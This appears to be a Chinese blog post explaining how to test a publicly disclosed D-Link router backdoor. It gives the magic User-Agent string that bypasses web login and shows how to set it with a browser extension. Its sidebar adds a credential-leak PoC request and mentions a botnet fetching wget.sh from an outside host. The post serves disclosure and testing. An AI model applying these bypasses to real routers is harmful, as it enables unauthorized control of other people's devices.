D-LINK路由器后门漏洞测试方法

最新推荐文章于 2024-01-27 12:52:00 发布
最新推荐文章于 2024-01-27 12:52:00 发布
阅读量1.1w 收藏 3
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/myths_0/article/details/20207991
版权

国家互联网应急中心

http://www.cert.org.cn/publish/main/9/index.html

多款D-LINK路由器产品存在后门漏洞

(受影响的D-LINK路由固件版本涉及DIR-100、DI-524、DI-524UP、DI-604S、DI-604UP、DI-604+、TM-G5240、TM-G5240、BRL-04R、BRL-04UR、BRL-04CW、BRL-04FWU)

        D-LINK部分路由器使用的固件版本中存在一个人为设置的后门漏洞(收录编号:CNVD-2013-13777)。攻击者通过修改User-Agent值为“xmlset_roodkcableoj28840ybtide”(没有引号)即可绕过路由器Web认证机制取得后台管理权限。取得后台管理权限后攻击者可以通过升级固件的方式植入后门,取得路由器的完全控制权。



D-LINK太狠了, HTTP消息头改个值就能绕过验证 ,如果你用的Google Chrome浏览器,可以去Chrmoe网上应用店下一个Header Hacker插件(https://chrome.google.com/webstore/detail/header-hacker/phnffahgegfkcobeaapbenpmdnkifigc/related)做测试

设置如下替换:



先用Chrome登陆你的D-LINK路由,shift+ctrl+c打开chrome自带的调试工具,选择network标签,刷新网页(在打开调试工具的情况下刷新),刷新后在左边找到该网页url,点击后右边选择headers,就可以看到当前网页的http头了, 比如:

Request Headersview source
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding:gzip,deflate,sdch
Accept-Language:zh-CN,zh;q=0.8
Cache-Control:max-age=0
Connection:keep-alive
Host:192.168.1.1
User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36


勾选插件刚才设置的替换值:


在打开调试工具的情况下刷新页面,观察HTTP的发送头(Request Headers)的User-Agent值是否改变,如:

  1. Cache-Control:
    max-age=0
  2. Connection:
    keep-alive
  3. Host:
    192.168.1.1
  4. User-Agent:
    xmlset_roodkcableoj28840ybtide <--------------已改变 说明插件改变成功

应为使用的不是D-Link路由,不知道会出现什么界面,大家自行测试吧,别用于非法用途就好.



myths_0
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
浅谈D-Link系列路由器漏洞挖掘入门
10-02
主要介绍了浅谈D-Link系列路由器漏洞挖掘入门,详细的介绍了D-Link系列的各种漏洞,具有一定的参考价值,有兴趣的可以了解一下
D-Link 5个安全漏洞
systemino的博客
08-25 2275
7月早些时间,研究人员爆出D-link 路由器固件镜像泄露了用来加密专用固件二进制文件的密钥。近日,又有ACE 团队研究人员爆出D-Link路由器的5个严重安全漏洞,攻击者利用这些漏洞可以实现网络入侵。此外,由于部分设备已经不再更新,因此无法修复。 漏洞概述 这些漏洞包括反射型XSS攻击、缓冲区溢出漏洞、认证绕过和任意代码执行,分别是: CVE-2020-15892 CVE-2020-15892漏洞是基于栈的缓冲区溢出漏洞漏洞位于ssi 二进制文件中,可能会引发任意命令执行。 CVE-2020-
漏洞复现】友讯D-Link路由器信息泄露漏洞
晚风不及你
01-27 541
友讯电子设备(上海)有限公司于2002年8月13日成立。公司经营范围包括区内以路由器、网络卡、集线器、交换器、转换器等。
物联网漏洞分类总结
Chary的Blog
07-12 3720
一、物联网漏洞分类 二、造成漏洞的原因 1 不安全的Web接口 一般情况下,攻击者首先会在智能设备的Web接口中寻找XSS、CSRF和SQLi漏洞。此外,这些接口中还经常出现“默认用户名和密码”和“缺乏帐户锁定机制”之类的漏洞。 设备类型 设备名称 CWE 安全影响 Heatmiser恒温器 CWE-598:通过GET请求中的查询字符串泄露信息 攻击者可以访问设备的所有设置,进而根据攻击者的意愿来随意更改各种设置,例如时间或温度。 工业无线接入点Moxa AP CWE-79:网页生成过程中没有对输入进行严
2021年漏洞小结-手工自检篇
weixin_48421613的博客
12-28 1322
声明: 此文章仅作为上篇文章工具检测后,进行手工验证或手工检测,该文章仅供于学习参考或企业自检,请勿用于非法用途。​请阅读文末声明 D-Link-DIR路由器 账号密码信息泄露漏洞 poc: /getcfg.php SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a 页面原型: 漏洞检测: 输入任意密码,而后点击登陆按钮,同时进行数据包拦截,修改数据包内容如下图 用户名以及密码就出来了​ 脚本参考如下: import requests url=inpu
D-Link系列家用路由器漏洞分析总结
Hello World.c
04-27 2083
D-Link系列家用路由器漏洞分析总结 ⚡ 尚未了解清楚 ❗ 已编写好完整POC ❓ 未能编写完整POC ❌ 暂时不能实际验证 DCS-2530L CVE-2020-25078 ❗ 敏感信息泄露 D-Link DCS-1100 || DCS-1130 CVE-2017-8416 ⚡ DIR-850L cgi动态web服务器 CVE-2017-3193 ❗ 认证前栈溢出 CVE-2017-14421 ❗ 路由器后门 DIR-816 独立web服务器 CVE-2021-27114 ❓ 认证后栈溢出 CVE
D-Link RCE漏洞分析
weixin_43137410的博客
09-08 416
跟着IPS学信息安全6-DLink HNAP未授权漏洞攻击
sinat_19277729的博客
06-30 379
近年在物联网的迅速兴起下,网络设备的低成本、功能快速迭代需求导致厂商往往更加无暇顾及安全问题,在奇安信披露的安全漏洞中可以看出,该协议在主流路由器厂商的实现中仍然存在大量高危安全漏洞,其中部分高危漏洞利用条件非常低,结合DNS Rebinding等利用方法,极容易被用于大范围钓鱼攻击,控制大量终端形成僵尸网络,大范围影响互联网安全。后续攻击代码大致包含内容是,进入tmp目录,然后从http://45.95.55.xxx下载wget.sh,再执行wget.sh,此时要送入参数selfrep.dlink
D-link850路由器漏洞挖掘与利用
weixin_43046297的博客
12-28 1777
D-link850文件结构和各部分功能: 分析小型路由器,D-link850是个经典案例,解析完固件后,首先要搞清楚文件系统,可以从前端入手,追踪其数据流向,看前端对应的后端二进制处理文件。 因此我们系统地梳理一下D-link850存在的相关漏洞及发现过程: 敏感信息泄露: 首先我们不知道漏洞的位置,我们仅通过前端的相关信息进行数据流的追踪: 快捷配置界面:bsc_easysetup.php 但是解析后的系统文件夹内有3处有bsc_easysetup.php(web文件下,webinc的bo.
群晖openwrt旁路由_[openwrt监控]如何配置Check MK进行基于openwrt的软路由监控
weixin_39637397的博客
11-04 1045
最近用吃灰的nuc搭建了一个基于OpenWrt的软路由,用的旁路由模式。日常待机10W左右,用着还不错。下面讲一下如何用check_mk来监控OpenWrt系统:1、点击右边导航栏中的Monitoring Agents链接,然后在点击右侧的Check_MK Agent for OpenWRT链接2、把连接中的脚本复制出来3、登陆软路由并创建check_mk_agent:nano /usr/bin/...
Linux /dev/null详解
weixin_30546933的博客
07-01 382
常用的命令展示 /dev/null 和 /dev/zero的区别 1./dev/null:表示 的是一个黑洞,通常用于丢弃不需要的数据输出, 或者用于输入流的空文件 1.1 将无用的输出流写入到黑洞丢弃。 curl -Iwww.baidu.com 2>/dev/null | head -l 错误信息定位到黑洞...
TP-LINK路由器后门的工具及方法
07-28
关于TP-LINK路由器后门的收集整理以及工具的使用方法,点到即止。
家用路由器漏洞挖掘工具和资源
07-22
路由器漏洞挖掘技术和资源
D-link路由器防ARP设置方法
10-01
它的危害就像感冒一样,会引起各种问题的出现,严重时会盗取用户的帐号密码,造成经济损失,或是使得整个网络瘫痪了,现在很多路由器都内置了防ARP欺骗功能,今天我们就D-link路由器为例
TP-LINK路由器高危漏洞的防范解决方法
10-01
windows自带的防火墙能很好的帮我们防范TP-LINK路由器出现的高危漏洞,那么这里我就用图文并茂的方式教大家如何开启windows防火墙
D-link路由器 如何设置及故障排查
10-02
路由器已经可以在我们生活的各个角落都能看到了,人们也早已进入了网络生活,但是现在还是有很多人不知道如何去设置路由器,并且当遇到一些小的故障时也不清楚如何去解决,本篇以D-link路由为例介绍
D-LINK路由器开启远程管理配置图文教程
10-01
主要介绍了D-LINK路由器开启远程管理配置图文教程,开启路由器的远程管理功能,可以帮助不懂的人配置一些东西,需要的朋友可以参考下
满意度调查行·知dr.pptx
04-25
满意度调查行·知dr.pptx
基于B2C的网上拍卖系统_秒杀与竞价.zip
最新发布
04-25
基于B2C的网上拍卖系统主要用于帮助人们应用互联网方便快捷买到自己所中意的商品,并参与到秒杀与竞拍当中。 主要功能包括: 1.前台模块 (1)普通用户登录/注册。 (2)分类查看商品(普通商品与促销商品) (3)查看商品详细信息 (4)查看秒杀商品 (5)查看竞拍商品 (6)将商品加入购物车 (7)购买,结算功能 (8)留言 2.后台模块 (1)修改密码 (2)商品管理: -- 编辑/删除 -- 设置/取消促销 (3)秒杀商品:设置/取消秒杀 (4)竞拍商品:设置/取消竞拍 (5)订单管理:查看订单 (5)留言管理:查看/删除留言 项目访问路径: 前台:http://localhost:8080/sale 后台:http://localhost:8080/sale/user/adminlogin
tp-link路由器配置
09-02
对于TP-Link路由器的配置,您可以按照以下步骤进行操作: 1. 将您的电脑或移动设备与TP-Link路由器连接。您可以通过有线(使用网线连接)或无线(Wi-Fi连接)方式进行连接。 2. 打开任意浏览器,输入TP-Link路由器...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值